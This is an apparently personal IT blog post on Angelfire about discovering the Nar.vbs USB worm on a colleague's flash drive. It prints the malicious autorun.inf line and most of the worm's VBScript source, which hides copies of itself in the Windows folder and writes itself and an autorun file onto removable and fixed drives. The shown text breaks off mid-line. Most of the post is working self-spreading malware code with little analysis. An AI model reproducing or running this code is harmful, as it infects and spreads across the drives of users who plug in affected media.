Site hosted by Angelfire.com: Build your free website today!

IT Journal of Steve Kline

A little about me, what I do, and what I know

Nar.VBS and Autorun.inf

I am pleanty sure that someone has run into this ugly little punk somewhere around the world... Originally I discovered it on my hard drive when I was copying some data from a colleages flash drive. I wasn't sure what it was or where it came from. I had issues with a DVD not loading, without thinking I checked the registry. Autorun seemed to be funky because nothing would ever come up. My colleage had the same issues. I enabled my anti-virus wondering if something would catch, sure enough, this NAR.VBS file came back registered as a worm. It popped up out of multiple locations on the hard disk. I asked for the flash drive my friend had given to me before and noticed that Nar.vbs had come off of his flash drive. It went to all of my flash drives as well.

The autorun file had line of script in it.

Autorun.INF

shellexecute=wscript nar.vbs

That's pretty funky, I know VB, lets see what this bad boy has written...

Nar.VBS

'v0.1

on error resume next

dim narsource,nar_RunDir,windir,disk_Drive,fso,mf,autorun,to_File,text,shell,in_WinDir,wsh_Path

set fso = CreateObject("Scripting.FileSystemObject")
set shell = CreateObject("Wscript.shell")
set mf = fso.GetFile(Wscript.ScriptFullname)
nar_RunDir = fso.GetParentFolderName(mf)
Set windir = fso.getspecialfolder(0)
in_WinDir = 2
wsh_Path = fso.GetFile(Wscript.Fullname)

If (fso.FileExists(Windir & "\nar.vbs") = 0 or in_WinDir = 1) then
set to_File = fso.getfile(windir & "\nar.vbs")
to_File.attributes = 32
Kill (windir & "\nar.vbs")
End If
If (fso.FileExists("C:\Windows\System\nar.vbs") = 0) then
set to_File = fso.getfile("C:\Windows\System\nar.vbs")
to_File.attributes = 32
Kill ("C:\Windows\System\nar.vbs")
End If
If (fso.FileExists("C:\nar.vbs") = 0) then
set to_File = fso.getfile("C:\nar.vbs")
to_File.attributes = 32
Kill ("C:\nar.vbs")
End If

If (fso.GetAbsolutePathName(windir) <> fso.GetAbsolutePathName(nar_RunDir)) Then
shell.run(windir & "\explorer.exe /root," & nar_RunDir)
in_WinDir = 0
Else
in_WinDir = 1
End If

If (fso.FileExists(windir & "\nar.vbs") = 0 or in_WinDir = 1) Then

autorun = "[autorun]"&vbcrlf&"shellexecute=wscript.exe nar.vbs"
set text=mf.openastextstream(1,-2)
do while not text.atendofstream
narsource=narsource & text.readline
narsource=narsource & vbcrlf
loop


If (in_WinDir = 0) Then
set to_File = fso.getfile(windir & "\Nar.vbs")
to_File.attributes = 32
set to_File=fso.createtextfile(windir & "\Nar.vbs",2,true)
to_File.write narsource
to_File.close
set to_File = fso.getfile(windir & "\Nar.vbs")
to_File.attributes = 39
End If

do while (in_WinDir = 1)
for each disk_Drive in fso.drives
If (disk_Drive.drivetype = 1 or disk_Drive.drivetype = 2) Then

set to_File=fso.GetFile(disk_Drive.path & "\nar.vbs")
to_File.attributes = 32
set to_File=fso.CreateTextFile(disk_Drive.path & "\nar.vbs",2,true)
to_File.write narsource
to_File.close
set to_File=fso.GetFile(disk_Drive.path & "\nar.vbs")
to_File.attributes = 39

set to_File=fso.GetFile(disk_Drive.path & "\Autorun.inf")
to_File.attributes = 32
set to_File=fso.CreateTextFile(disk_Drive.path & "\Autorun.inf",2,true)
to_File.write autorun
to_File.close
set to_File=fso.GetFile(disk_Drive.path & &q